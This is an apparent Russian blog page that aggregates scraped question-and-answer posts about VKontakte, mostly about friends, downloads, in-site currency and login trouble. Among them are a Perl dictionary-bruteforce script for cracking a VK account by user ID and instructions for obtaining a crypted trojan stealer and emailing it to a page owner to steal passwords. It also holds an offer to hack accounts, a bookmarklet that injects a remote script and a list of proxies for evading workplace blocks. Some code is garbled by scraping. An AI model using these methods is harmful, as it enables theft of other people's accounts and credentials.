вторник, 7 мая 2013 г.

Как вконтакте или в однокласниках добавить Бога в друзья?



Я не признаю 1) Бога 2)Социальныйе сети но можете попробовать просто создать сами бога и добавить....верующие же создали у себя в голове. Так у вас на него еще и посмотреть можно будет и другим показать. Реальнее чем у верующих

Помогите написать сочинение, кто поможет тому 43 голоса в вконтакте)

Голоса гарантирую но нужно чтоб сочинение было своё и без ошибок, и не списанноё

Где можно вчерашний симулкаст ЛЧ посмотреть, или скачать?

вконтакте

Почему парниша 32 года выкладывает у себя вконтакте на странице картинки как стать богатым,крутым,сильным,умные фразы?

Ищет таких же как он по характеру.Ну и желание прославится.Йа тоже в своём блоге и в ответах ради этого и ради того что бы помочь другим людям.

Если Вконтакте пишешь что ты влюблен человек в которого ты влюблен видет это или нет ?

Если ты указал в кого влюблен, то этот человек видит это, при редактировании страницы, около сп, написано в вас влюблен________

Темы для Вконтакте

Кто знает где можно взять еще темы Вконтакте кроме как в группе?

Почему не могу загрузить картинки JPEG в ВКонтакте? Не видит их вообще. Что делать?

Активные вирусы. Это раз! Битые браузеры. Это два. Битая Виндовс - самое страшное. Это три!

Как перевести голоса в деньги ВКонтакте? в яндекс! ))

никак. голоса в деньги больше не конвертируются.

Вконтакте.

скажите пожалуйста как скачать флэш плерр из контакта я сачаивал давно он у меня загружал! А теперь я всё перекачал с этго сайта где указан и всё раво не загружает по 50 фоток! что делатЬ?

Техподдержка Вконтакте бесплатно?

да, некоторые даже прикалываются над агентами техподдержки))

Плииз,помогите вылечить вирус!!не могу зайти вконтакт,вот что пишут-Ваша страница заблокирована!

Ваша страница заблокирована Поскольку Ваш аккаунт был взломан и с него происходит рассылка спам-сообщений, мы ограничили Вам доступ. Чтобы возобновить полноценный доступ к сайту необходимо подтвердить, что Вы являетесь настоящим владельцем данной страницы. Инструкция по активации Для активации страницы Вам необходимо воспользоваться платной услугой посредством терминала оплаты. Внимание Сумма, зачисленная Вами за активацию аккаунта, попадает на баланс Вашей страницы в виде рублей. Далее Вы можете распоряжаться ими на Ваше усмотрение, покупка голосов, раздача подарков и т.д. C:\WINDOWS\system32\drivers\etc/ hosts- пробовала удалять все лишнее,но изменения не сохраняются((((пишут проверить путь и имя!пробовала удалять hosts-нет прав! утилита Dr.Web CureIt. нашла косяки,но ничего не вылечила((( еще яндекс заблокирован! что делать?

где скачать бесплатно игру в шахматы? спасибо.

вконтакте есть бесплатное приложение , там шахматы ,крестики нолики и еще какае-то игра

Как добавить Нюшу ВКонтакте??? Как добавить Нюшу ВКонтакте???

нажми на кнопочкудобавить в друзья))))

какая программа нужна для скачивания аудиозаписей вконтакте?

ссылка на мыле

Где можно бесплатно скачать Вконтакте Live?

Что бы не возникало проблем поставь себе условие - скачать его платно! После того как произойдёт облом, ты найдёшь сотни ссылок и скачать ПЛАТНО ни по одной из них ты не сможешь, то придётся качать БЕСПЛАТНО.http://moiavu.ru/journal/avutag/skachat-...

Хочу создать популярную группу вконтакте!Какую группу создать (на кокую тему)

Да никакую, можно самую идиотскую тему придумать там раскрутка все ровно за деньги

Как вы думает Мой мир, Вконтакте и одноклассники косят друг под друга???

Как вы думаете кто под кого косит? И вообще может это 3 совсем разных сайта..хотя по моему идеи у них одинаковые))Лично мне кажется что Мой мир косит под Контакты, а контакты и одноклассники сами по себе))

как называется группа Вконтакте де можно посмотреть ответы ЕГЭ?

их 2 1) военком ждет тебя 2) тюрьма ждет тебя

Не заходит вконтакт....

1. Ищем файл hosts на компьютере Либо встроенным поиском в Windows, либо по следующим адресам: Windows 95/98/ME: WINDOWS\hosts Windows NT/2000: WINNT\system32\drivers\etc\hosts Windows XP/2003/Vista: WINDOWS\system32\drivers\etc\hosts Открываем файл — нам предлагают выбрать программу для открытия файла, выбираем Блокнот (Notepad). Или правой кнопкой мыши — «открыть с помощью». 2. Исправляем файл hosts «Чистый» файл hosts должен выглядеть так: # Copyright (c) 1993-1999 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a # symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host 127.0.0.1 localhost Или в русской версии: # (C) Корпорация Майкрософт (Microsoft Corp.), 1993-1999 # # Это образец файла HOSTS, используемый Microsoft TCP/IP для Windows. # # Этот файл содержит сопоставления IP-адресов именам узлов. # Каждый элемент должен располагаться в отдельной строке. IP-адрес должен # находиться в первом столбце, за ним должно следовать соответствующее имя. # IP-адрес и имя узла должны разделяться хотя бы одним пробелом. # # Кроме того, в некоторых строках могут быть вставлены комментарии # (такие, как эта строка), они должны следовать за именем узла и отделяться # от него символом #. # # Например: # # 102.54.94.97 rhino.acme.com # исходный сервер # 38.25.63.10 x.acme.com # узел клиента x 127.0.0.1 localhost Если он выглядит по другому (а так скорее всего и будет) — удалите все в нем и вставьте приведенный выше текст. Теперь сохраняйте изменения (помните что у файла hosts не должно быть формата hosts.txt — неправильно!). И перезагрузите компьютер. ! Если файл открыть или изменить нельзя — значит это действие блокирует вредоносная программа. Нужно отредактировать его в Безопасном режиме. Для этого перезагрузите компьютер, во время загрузки жмите F8, появится список вариантов загрузки — выбирайте «Безопасный режим». И исправляйте файл hosts. Теперь заходите на любимый сайт — все будет работать. А если нет — читаем дальше. 3. Удаляем vkontakte.exe и svc.exe Если вконтакте все равно не открывается, идем Пуск -> Поиск -> Файлы и папки -> Дополнительные параметры -> Ставим везде галочки (искать в системных файлах, в скрытых и т.д.) -> ищем vkontakte.exe либо svc.exe Находит? — удаляйте, перезагрузите компьютер, проверьте заходит ли в контакт. Другие способы восстановления работоспособности ВКонтакте После каждого способа надо перезагрузить компьютер и проверить открывается или нет сайт: 1) Можно попробовать переместить все содержимое папки C:\WINDOWS\system32\drivers\etc в какое либо другое место. Именно перенести, а не скопировать. 2) Чистим маршруты: Пуск -> Выполнить -> набираем cmd -> в командной строке набираем ipconfig /flushdns. 3) Восстановление системы Пуск -> Все программы -> Стандартные -> Служебные -> Восстановление системы Делаем откат на тот день, когда все работало. 4) Если и это не помогло, то чистим компьютер от вирусов. И самый последний и действенный способ: 5) Переустановка операционной системы...

как узнать свою ссылку в вконтакте?

зайди на свою стр и посмотри вверху, ну типо этого http://otvet.mail.ru/question/81471035/

Как вконтакте отметить всех друзей на фото?

Нажать кнопочку отметить, чтобы высветился список Ваших друзей вместо ссылки вконтакте.ру вставить java script:(function(){function getPhotoInfo(){if(res = /([0-9\-]+)_(\d+)/.exec(location.href))return {mid: res[1], pid: res[2]};else return {mid: 0, pid: 0};}p_mark = function(i){if(i >= window.friends.length){ge(rotating).innerHTML = lt;h4gt; All friends have been marked on this photo!lt;/h4gt;;clearTimeout(timerID);return;}request_uri = /photos.php?act=putpid=+mid+_+pid+id=+mid+oid=0subject=+window.friends.id+name=+encodeURI(window.friends.name)+add=1x=0y=0x2=100y2=100;img = new Image();img.src = request_uri;ge(commentArea).innerHTML = (i+1) + of + window.friends.length + friends have been marked!;timerID = setTimeout(p_mark( + (i+1) + ), 500);};p_markall = function(){if(!confirm(Are you sure want to mark all friends?\r\n\r\n\r\nBugs Thanks: )) return;ge(rotating).innerHTML = lt;h4gt; Processing Please wait...lt;/h4gt;;ajax = new Ajax(function(a,r){eval(r);window.friends = fr; p_mark(0);}, function(a,r){alert(Request problem. Try again);});ajax.get(/photos.php?act=get);};if(!(location.href.match(/) location.href.match(/photo/))){alert(Open page with photo); return;}var info = getPhotoInfo();var pid = info[pid], mid = info[mid], friends;p_markall();})(); это работает в мозилле убрать пробел между java script, потом enter, в поле ок, потом если на страницу вернуться там все отмечены

Взламываю аккаунты вконтакте. Обращайтесь.

что бесплатно что ли

валидация страницы вконтакте бесплатно?

Отсюда или по альтернативной ссылке устанавливаем специальную программу. вот статья посвященная этой программе. И всё работает. Программа отрабатывает свою функцию очень быстро поэтому не надо тыркать по иконке не рабочем столе тысячу раз. Признак срабатывания программы-мелькнёт черное окошко. Компьютер перезапустить обязательно. Самый простой надёжный и действенный способ. Также защищает компьютер от подобной блокировки в будущем Также обязательно проверить компьютер на вирусы утилитой DRWeb CureIt. Скачать её можно с сайта http://www.freedrweb.com/download+cureit... По всем вопросам в личку,агент или аську 562858356 с пометкой Reset Hosts Если не поможет программа,то адреса по которым меня можно найти указаны выше. При обращении гарантия разблокировки 99.99999999% =)

где можно скачать песню spor toto super final. скажите какойта сайт

вконтакте.ру наверняка

Что лучше Мейл ру или Вконтакте? Имею ввиду как социальная сеть!?И почему?

Мне по душе Мейл,хотя и в Вконтакте я зарегистрирована. Подумав,Вконтакте лучше-Дизайн,быстрота,посещаемость,разнообразие приложений и функций.Но для меня Мейл лучше по одной простой причине:несмотря на то,что в Вконтакте сидят многие,зато Мейл выбирают все.Тут друзья,тут все,что хочет душа))

Как признаться в любви вконтакте парню?

Ну тогда напиши ему На самом деле я люблю тебя, просто я боялась признаться!Я очень жду лета, что бы увидеться с тобой! И побыстрее нажимай ОТПРАВИТЬ!!!Что б не разволноваться и не передумать с отправкой. Удачи;)

как взломать копатель онлайн вконтакте на золото?помогите плиииззз :) помогите плиииззз :)

попробуй чит енджин там всякие взломы есть взломы на копатели но не уверен что есть на деньги(((

слышал что можно сменить имя вконтакте за голоса подскажите как это сделать?

ты можешь просто изменить имя зайдя в настройки

вы часто заходите на страницы людей вконтакте, которые у вас в списке друзей стоят на 1-3 местах?и с ними общаетесь???

Это и есть те люди, с которыми я больше всего общаюсь и переписываюсь!

Как Вам сайт Вконтакте?

Как Вам сайт клёвый да?Новые фукнции.. для VIP пользователей..

скажите почему вконтакте показывает что онлайн 8 друзей, а реально там 2....5 часов подряд

самому интересно.наверно это не какои не онлайн

Почему вконтакте девчёнка скрыла меня в друзьях.!? как думаете?

Вот я два месяца назад познакомился с девчёнкой вконтакте и почему я у неё оказался в скрытых друзьях как думаете... у меня к ней симпатия и у неё тоже... каждый день общаемся почти... то она мне пишет первая то я ей) во не пойму для чего скрыла меня...

где скачать приложение вконтакте для айфон?

Я слышал ,что его можно скачать в интернете но я не поверел)))) А еще в интернете оказывается можно скачивать программы и приложения, зашибись да?

как добавить людей в группу вконтакте?

раньше можно было приглашать людей из вне, (т.е. не своих друзей, а посетителей сайта ВКонтакте принципе), сейчас нельзя, - только своих друзей((( .В программы, якобы которые добавляют людей я не верю-развод это все. Может быть есть какой-нибудь выход????Подскажите пожалуйста!!!

Когда откроют сайт Вконтакте?почему его закрыли?

возможно Вы словили вирус и происходит переадресация. WINDOWS / system32 / drivers / etc / hosts - откройте в блокноте и посмотрите, тем ли там адреса вконтакта и его переадресации. У меня неделю назад такая фигня была. Удалила файлик hosts (но лучше не удалять, а перенести куда-нибудь, на всякий случай), сделала проверку на вирусы и вот какая-то кака нашлась, с которой можно удаленно на мой комп залезать. Вирусы удалила и теперь все работает.

вконтакте. в группах вконтакте не запретили использовать меню копки? по фоткам меню

Нет, не запретили, но навсегда скрыли это по умолчанию, а также отключили это по умолчанию, при создании новой группы. Администратор группы должен открыть меню Управление сообществом и включить Материалы. Затем перейти на главную страницу группы и заполнять их.

Можно ли как нибудь скачать вконтакте у пользователя сразу все фотки или только по одной?

можно, скачайте браузер гугл хром и поставьте на него Вконтакте аддон и там будет функция скачать все фотки из альбома

Почему Вконтакте все добавляют друзей, а один я удаляю?

Я не добавляю, и не удаляю. Меня раздражает, что в контакте, и здесь все добавляются ради количества, а потом не общаются. Поэтому я сначала общаюсь с человеком. прежде чем его добавить. Чтобы потом не удалять без надобности.

Подберите коротенькие статусы для Вконтакте)))

Только НЕ про любовь!!!!Можно юмор, лето, дружба. И короткие максимум строчка*

Поссорился не давно с девушкой, она удалила меня с друзей вконтакте..в скайпе мы общались почему и т.д.

Во общем договорились встретится встретились и я начал извинятся она сказала что всё нормально... с итоге пообщались на улице посидели, в конце она меня обняла и потом я ей сказал что хотел ей предложить стать моей девушкой, она сказала так быстро, и говорит что мы потом с тобой поговорим.. Сейчас она у меня не в друзьях вконтакте но заходит и ставит лайк на стене если ей понравилась моя запись... У меня есть шансы что она будет моей..??просто сейчас она не может найти для меня время свободного проблема с учёбой..она знает что мне она нравиться... ну если она меня при прощание обнимает значит и я ей нравлюсь? и есть шанс?

Где,на каком сайте можно реально нахаляву посмотреть онлайн самые последние фильмы?

ВКонтакте.ру И смотрю и скачиваю. Есть даже фильмы,которые больше ни где не смог найти.

Люди подскажите пожалуйста как называется, и где можно скачать программу для скачивания музыки на сайте Вконтакте

Вот пожалуйста программа для скачивания видео и аудои из сайтиа ВКонтакте http: // l ifesoft.ucoz. com/news/vksaver_116/2009-12-27-11 (убери пробелы)

А вам вконтакте не писали добрые боты?))

Она прилагается в статусе полуголой девицы, которая это написала. Прикинь такую картину: Под твоей не самой удачной фоткой оставил комментарий бот у которого на аватарке чуть ли не порнозвезда. Какая у тебя реакция? Конечно, посмотреть кто это или по крайней мере посмотреть на увеличенную аватарку полуголой девицы. Ну а у неё на страничке этих ссылок кучи. Кстати, теперь их вроде поубавилось..

Почему у меня нет вконтакте слева в колонке Мои встречи? и в Моих настройках тоже нет!

встречи в: мои группы, там сверху сразу видно предстоящие встречи на которые вы идёте)

Ребят,дайте ссылку для накрутки друзей вконтакте без бана.

ахаххахахахахахахахахахахахахахахахахахахаххахахахахахаххааххахахахахахахахахахахахахахахахахахахахаххахахааааааааааааааааааааахххххххххххххххххаааааааааааааааааааааааааааааааааааааааааа

бесплатно ли создание группы ВКонтакте?

абсолютно, но вот раскрутка влетит в копеечку

McAfee блокирует сайт Вконтакте. Хотя у меня другой антивирус.

Панель управления - Администрирование - Управление компьютером - Сервисы. Найти, отключить и остановить McAfee.

10 баллов за ответ. Ка взломать акаунт ВКонтакте? Очень надо.

use IO::Socket;use MD5;use threads;use threads::shared;my @pass : shared;####################################### C!klodoL# bruteforce with multi-threads######################################$dic = ‘passl.txt’; #словарь паролей$id = 111111; #id цели$mail = ‘mail@mail.com’; #мыло, вместо @ вписать @$threads = 4; #количество потоков######################################open (pass, “create(\Brut, $_);}for(@trl) { $_->join; }sub Brut{while(@pass){$pass = shift @pass;$md5 = MD5->hexhash($pass);$sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’’,PeerPort=>80);print $sock “HEAD HTTP/1.0\r\n”.“Host: \r\n”.“Accept: */*\r\n”.“Content-Type: application/x-www-form-urlencoded\r\n”.“User-Agent: Mozillo\r\n”.“Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n”.“Connection: close\r\n\r\n”;$answ = ;close $sock;print “$pass $answ”;if ($answ =~ /302/){open (good, ‘>>good.txt’);print good “$id:$pass:$md5\n”;print “$id:$pass:$md5\n”;close good;exit;}}}goto Next;sub pass{my (@mas);while (){push @mas, $_;last if (@mas == 400);}chomp @mas;return @mas;}

На работе почти ко всем сайтам заблокирован доступ! Через какие зеркала можно заходить как минумум на сайт вконтакте?

заходиВот список анонимайзеров, которые помогут Вам обойти все ограничения Вашего руководства:www.474.cc/webwarper.net/amegaproxy.com/www.w3privacy.com/www.anonymizer.ru/www.long999.com/www.calcmaster.net/www.idzap.com/www.goproxing.com/www.proxymouse.com/www.proxywave.com/www.freeproxy.ca/www.hackingtruths.org/proxyxanproxy.be/www.proxyanon.com/www.proxysafe.com/www.strongproxy.com/surfonym.com/www.browseatwork.com/www.anonymousurfing.info/www.browsingwork.com/www.anotherproxy.com/www.proxifyme.com/www.unblockthis.com/www.hidingyou.com/www.fsurf.com/www.proxy-surf.net/http://www.totalupload.com/surf/www.arandomproxy.com/proxynanny.com/www.anoniproxy.com/pleaseunblock.com/www.proxylord.com/www.proxyindex.com/www.surf-anonymous.org/www.privacy-world.com/www.surf24h.com/bywhat.com/gothru.info/www.stupidschool.com/www.ianonymous.info/viewtheweb.info/openblockers.info/dontbestopped.info/www.proxy4myspace.org/www.freedomtunnel.info/privatebrowse.info/getonnow.info/freemyurl.info/bypasslocks.info/www.noipproxy.com/www.iproxy.eu/bypassway.net/browsebrisk.combrowsecrafty.comhidden4u.com

люди добрые!!! забыл пароль вконтакте!!! просит телефон а симке привязанной к странице 100 лет!!!

просит телефон а симке привязанной к странице 100 лет новый аккаунт создавать нет желания и смысла на е-маил не отправляет скотина форма востановления доступа - ни хрена не помню уже. только щас задумался над этим. ЛЮДИ ДОБРЫЕ ОТВЕТЬТЕ!!!

Не могу войти вконтакт,т.к просит разморозить страницу.Что делать?

Файл хост в порядке,после 127.0.0....ни каких ссылок не присутствует.Сайт в контакте просит потвердить смс на короткий номер. Добавлено 2 недели назад Ничего подобного!!!Это мошенничество.У меня,только через анонимайзер заходит!!!!

Вконтакте- как так может быть: человека нет онлайн, а прослушиваемые песни в статусе меняются, будто он слушает музыку?

Ну он поёт просто про себя песни и там меняется. Мы терь сами как компы с этим кантактом

Народ, можно ли сделать так, что бы вконтакте не высвечивалась моя страница онлайн и не показывался последний визит?

да, не заходить на чужие станицы и не писать не кому смс тогда возможно, при этом можно слушать музыку и читать новости .Но ни в коем случае ни на своей старнице не сидеть ни на чужих и не писать никому смс

!!!Вконтакте Тревога!!! Срочно зайдите в свои аудиозаписи вконтакте.. Что за нах.???Отпишитесь, что у вас!!!!

Расширение серверов, внедрение новых функций в работу базы данных, либо какой-нибудь сбой. Как будто впервые видите подобное в интернете.

как скачать картинку с фона вконтакте плагина?

иди читай книги ботан

Иногда вконтакте в разных группах пишут анектод и кнопку типа читать полностью, и при нажатии выкидывает в другую группу

в сообщении ставят * а потом пишут название сообщества вы так же можете попробовать написать у себя * и упомянуть вашего друга/сообщество, в середину имени вписать читать продолжение и лишнее(имя и фамилию) удалить

Можете в ответе скинуть картинку Филиппа Фрая из Футурамы, на такой картинке вконтакте пишут -мне кажется или....

давай на почту скину, а то сюда не могуhttp://www.google.ru/imgres?q=Филиппа+Фрая+РёР·+Футурамыhl=runewwindow=1sa=Xbiw=800bih=375tbm=ischprmd=imvnsotbnid=zjBv4P3v0tKP7M:imgrefurl=http://windoworld.ru/wallpapers/futurama/docid=v1ijO941mj1ZaMimgurl=http://windoworld.ru/wallpapers/futurama/1/25.jpgw=800h=600ei=JthtUNm4Jsem4gTEpIGQBgzoom=1iact=rcdur=2sig=113201784449691779555page=3tbnh=110tbnw=121start=29ndsp=15ved=1t:429,r:3,s:29,i:178tx=39ty=174

немогу зайти вконтакт что делать?

появляется окно (проверка безопасности) там написано (вы заходите с необычного места введите номер телефона я ввела пришло смс ответте на смс для получения кода оветила сняло 200р что делаль как зайти без смс и что это вообще такое?

Мне нужен сайт по поиску людей

вконтакте - если помоложе человек нужен, однокласники - если постарше, майспэйс - если иностранцы

Не могу зайти на страницу вконтакте!

диск C:(двойной щелчок левой кнопкой мыши) : 1.окрываем папку WINDOWS (двойной щелчок левой кнопкой мыши), 2.окрываем папку папку system32(двойной щелчок левой кнопкой мыши), 3.окрываем папку папку drivers(двойной щелчок левой кнопкой мыши), 4.окрываем папку папку etc(двойной щелчок левой кнопкой мыши)-иногда бывает скрытой(тогда-свойства папки)! 5.видим там документ hosts - проверь этот документ (открывать с помощью блокнота: Оставить только: 127.0.0.1 localhost __________________ хотя, если взломали, то ничего уже не поможет...

А Вы Вконтакте выделяете своих лучших друзей в разделе Лучшие друзья?

Помогите взломать пароль вконтакте!

Забыла пароль, помогите воостановить. если нет мира на Mail.ru и почты то же

проблема при добавлении друзей ВКонтакте

Я не знаю как с этой проблемой справиться,но знаю кто вам может помочь.1.Прокрутите вниз и увидите техподдержка.2.нажмите туда,и вы увидите разные графы,одна из таких-ВКонтакте-друзья3.там есть вопросы и на них ответы.вы поисЩите,может найдёте свою проблему.если нет,то напишите админам техподдержки.))Удачи!

Бывший не добавил в друзья вконтакте, на мой вопрос, почему он ответил: так будет безопаснее. Что ему ответить?

Он бывший епт, правильно сделал что не добавил!!! Я бы сделал также. Да и ты тоже молодец. Ты вообще себя уважаешь??? Того, кто сейчас трахает кого-то еще просишь добавить к себе, чтобы он показывал друзьям твои фотки и говорил: А вооо... Моя бывшая, такая была сучка... или что-то типа того... Это, конечно, чисто мое мнение, но имхо, если это БЫВШИЙ (не муж, а парень), у вас нет детей, которые бы вас связывали, какого х*ра тогда тебе от него надо??? Это прошлое. Оно прошло. Даже если ты тешишь себя надеждами, что вы сойдетесь - никогда не будет так, как было. Будет хуже. Потому что кто-то будет другого в разрыве упрекать, вспоминать, что он/она трахались с кем-то в промежутке между отношениями и т.д. и т.п. Мосты между прошлым и настоящим надо не сжигать, а взрывать к х*ям собачьим, чтобы их невозможно было восстановить!

Какие есть сайты вроде Вконтакте, Мой мир и Одноклассники?

http://fotostrana.ru/ практически тоже самое.

Как попасть к другу вконтакте в Общие друзья?

Никак, вы только можете посмотреть какие у Вас с ним общие друзья.Или зайти с чужой страницы к нему в друзья,вы там будете))))

Какие есть интересные социальные сети? вот только не пишите вконтакте, фейсбук, твитер

Если есть желание знакомиться с людьми для продолжения общения вне сети - совсем необязательно для этого лезть в соцсети. Есть же форумы,флудильни,просто чаты любого толка,в конце концов. Тем более что если ты любитель активного общения - на кой черт тебе малоизвестные социалки,в которых общается не самый широкий круг людей? Заведи страничку в ЖЖ,распиарь - наговоришься с людьми по самое не хочу.Проще всего же. А так - на выбор некоторые.На источник не обращай внимания.

как скачать музыку с сети вконтакте

На гугл хром есть расширение хорошее, MusicSig называется, можно будет и музыку и видео скачивать

где можно скачать бесплатно программу для взлома вконтакте по id

Млять почему все тухлые мечтатели вроде тебя лезут с этими вопросами сюда? Вы все реально думаете что кто то вам все щас раскажет и покажет....

можно ли найти одного единственного на сайте знакомств?)

Можно. Знаю людей, которые именно так знакомились. НО я считаю, что так знакомиться неправильно. Когда Вы рассматриваете чью-то фотографию, то как бы попадаете в прошлое время, когда она была сделана... Это неправильно... Нужно хотя бы сначала увидеть в реальности, почувствовать, вырабатываются ли у Вас гормоны или нет... Всё дело в них, и влечение тоже от них... Вы должны подходить друг другу...

как победить интернет зависимость и перестать сидеть вконтакте и ответах майл ру?

Надо задавать этот вопрос в релае... Побольше и почаще. Послушаете мнения в реале и будет меньше времени уходить на Интернет. Надо иметь в реале более яркие увлечения чем в Интернете, заниматься спортом или искусством. Если этот вопрос задётся только в Интернете то вряд ли получится победить эту зависимость...

помогите братюне, киньте ссылок на анонимайзеры в вконтакте,а то доступ закрыт.

С отцом поссорилась,а он со злости контакт заблокировал. киньте ссылок на сайты типо доступесть.ру. без общения не могу, знаю,есть еще мног соц сетей,но я в вк уже 4 года,жалко. срочно=(

Кто знает как вконтакте найти человека по эл почте???

Поиска пользователя по email адресу в данной социальной сети пока не существует...

Знакомая написала в статусе вконтакте что в кого-то влюбилась, как узнать в кого? Может быть в меня?

просто спроси её об этом а если сам влюблён признайся

Как зарегаться Вконтакте? Бесплатно ли? Блин страницу взломали...Помогите не знаю как новую создать((

я регистрировала племянницу , если попросит номер телефона не пугайся, с меня не сняли ни рубля, просто Аккаунт прикрепляется к номеру телефона и на номер присылается код....но все бесплатно

Как удалить страничку с сайта вконтакте?С мобильной версии можно это сделать?

С мобильной версии нельзя.можно с полной версии,там в настройках есть в самом низу

меня заспамили вконтакте теперь не могу зайти на страницу и новую создатьтоже не могу что мне делать????пожалуйста!!!

Это не спам это вирус)))) 1) заходиш в компе сюда C:\Windows\System32\drivers\etc 2) там будет файл host или xost точно не помню ну это не важно 3)кликаем на этот файл 2 раза, выбераем открыть через блокнот 4)удаляем всё надписи этого в этом фаиле (Сам файл нельзя удалять) 5)Закрывем файл, потверждая его сохранение 6)заходим в контакт и не паремся P.S Лучше сменить ВКонтакте пароль а то мало ли что))))

С помощью какой программы можно заблокировать доступ к социальной сети ВКонтакте.?

Насчет именно ВКонтакте не знаю, но программы вот такие есть, на выбор: NetWorx 5.2 тут TMeter 9.2.539 [Русский] тут NetPolice Lite тут Интернет Цензор 2.1 тут DameWare NT Utilities тут Net Limiter 2.1 PRO + serial тут Traffic Inspector тут NetTraffic тут Salfeld Child Control - программа ограничивает время, проводимое вашими детьми за компьютером - как только выделенное им время закончится, компьютер автоматически выключится и повторный вход будет возможен только после ввода пароля тут StatWin Professional - позволяет контролировать работу компьютера и активность пользователей, включая время начала и завершения работы, процессы и приложения, посещаемые URL, доступ к сетевым ресурсам и многое другое. StatWin Professional 8.4 тут

а как вконтакте написать что я встречаюсь с 3 девушками одновременно?

скачать музыку вконтакте через гугл. кто знает как???

http://ru.savefrom.net/7-как-скачать-кон... она же и с YouTube, ОК, ВК, Майл..

у кого есть программа для скачивания вконтакте и мире??

http://my.mail.ru/community/nadoznat/4D0... ---как качать с мира (аудио_видео) или не используя онлайн сервис : у огнелиса (Firefox) есть плагин Video DownloadHelper, у Opera есть виджет для скачки (вроде Flash Video Downloader), есть праги например: Ashampoo ClipFinders,HiDownload Pro,Orbit Downloader ;Save2PC Lite;VKLife ; RealPlayer SP

если я вконтакте пообзывал и поспамил человекам 10-и , от анонимного аккаунта , и в ментуру подали заявку , меня по айпи

меня по айпи могут вычеслить ментура ? Добавлено 2 года назад с тюрмы напишу , за мной уже пришли , поки всем

программа для скачивания музыки вконтакте

поставь в опере расширение vksaver или savefrom,net и всё... не надо никакого левого софта

студенты вконтакте пишут обо мне гадости что я лысый член, могу ли я за это их исключить из университета?

Мне кажется из университета вас давно исключить пора! Если вы и в жизни такие гениальные вопросы задаете и не дай Бог еще студентам на экзамене, неудивительно, что к вам такое отношение! Извините, конечно, я в инете нечасто бываю, но на ваши ахинейные вопросы натыкаюсь постоянно. Не подумали, что сюда и ваши студенты заходят и тоже все это видят? Вы же профессор, доктор наук...

opera не отображает сколько друзей онлайн вконтакте. opera не отображает сколько друзей онлайн вконтакте.

Может просто потому что их нет в онлайне? Ну или вы вкладку друзья онлайн свернули)

Можно ли вконтакте сделать группу из открытой в закрытую?

да ну не

как вконтакте бесплатно себе рейтинг поднять?

Полностью заполнить анкету. По другому НИКАК Совсем НИКАК. Все программы и прочее для якобы повышения рейтинга только твой пароль уведут А потом здесь же будешь задавать вопрос - у меня в контакт не заходит,СМС требует и прочее

Как узнать список контактов другого человека?

Вконтакте, одноклассники, мой мир, где?

зашла на страницу бывшего парня вконтакте, от его страницы теплота шла, что это?

не знаю что у Вас, но я так же недавно почуствовала теплоту в тот момент когда проговаривала про себя фамилию нынешнего парня. аж горячо стало на сердце. хотя раньше с другими фамилиями и именами такого не было. еще и ф церкви я была в тот момент

Как взломать вконтакте??? подскажите пожалуйста. или скачать провереную програму?! и как?!((

1. Ищешь путный троян ( если в гугле не забанили ) 2. Криптор покупаешь ( сам закриптовать не сможешь ) или откомпиленный трой отдаешь на крипт ( за деньги ) 3. Шлешь готового зверька на мыло владельцу ВК-станицы 4. Если стиллер не спален антивирем и его запустил-таки - получаешь все явки, пароли, квартиры, дачи и тонны нефти . . *профит! ---------------------------------------------------------------------------------------------------------------------Николай Антаков правильно посоветовал - проще заказать, чем тебе самому делать

Пускаете ли вы детей на Вконтакте, если да,. то как защищаете их от порно и проч., или вам все равно?

Над Вконтакте сейчас нормально кстати работают порно убрали,и очень тяжело его там найти,а вот брань и пахабщина-приветствуется.Дибильные картинки,пропагандирующие неправильное написание слов,брань,лень,...и прочее.Это есть.Ну это уже характер народа..никуда не денешься.Дуров скопировал с facebook ,но так фигово ...там то хоть все прилично,а у нас - .А что касается порно,то в инете его быстрее найти можно.Так что проще вообще инет вырубить если опасаетесь за такие сайты.

Как ВКонтакте получить голоса бесплатно? Это реально?

Это реально! В последнее время в контакте есть разные рекламные предложения (типо вступи в группу, или прокачайся в игре до определенного уровня) и за выполнение требуемых условий тебе дадут от 1 до 3 голосов за каждое рекламное предложение.

кто посоветует прогу для взлома вконтакте без вирусов и смс?

Прежде чем ломать, нужно построить.

А у Вас сегодня получается зайти на сайт ВКонтакте?

Социальная сеть «Вконтакте» не доступна пользователям. При попытке зайти в свой аккаунт появляется сообщение о том, что сервер не найден. По словам пользователей проблемы с доступом начались сегодня ночью – сайт временами был не доступен. Приблизительно между 11 и 12 часами дня он стал недоступен полностью. Ведутся технические работы, ожидайте!

Что случилось с ВКонтакте? У меня взломали страницу, теперь никак не могу восстановить! Что делать?

задавать вопрос в соответствующую категорию

Как скачать видео с контакта ( на вконтакте захожу через анонимайзер www.cameleo.ru)

Вставь на странице с видео в адресную строку этот скрипт без кавычек javascript:var s=document.createElement(script);s.src=http://videosaver.ru/vs.js?nc=+Math.random();document.body.appendChild(s);void(0); . (Инфа - http://videosaver.ru/blog/2008-11-15-20)

ВКонтакте. Мне подруга предложыла СП, ето как понять?

подруге лет 15 и она хочет чтоб ты поставил с ней семейное положение) Либо ты ей нравишься, либо надо перед подружками показать себя, либо заставить какого то мальчика ее поревновать к тебе))

где скачать программу Генератор паролей для тюряги вконтакте

нету такой прожки так что забудь!!!

Вы вконтакте или в сервисе?

на сервисе уже была-машинка довольна!теперь можно и контакты подчистить!

как кинуть голоса вконтакт через QIWI?

раньше было так... подходишь к автомату оплатить услуги/ в контакте (найти нужно не всегда на первой странице бывает) /вводишь логин и оплачиваешь

Скажите пожалуйста существует ли накрутка на тюрягу вконтакте

Только не надо кидать ссылки на то где надо смски вводить и т.д и т.п



Комментариев нет:

Отправить комментарий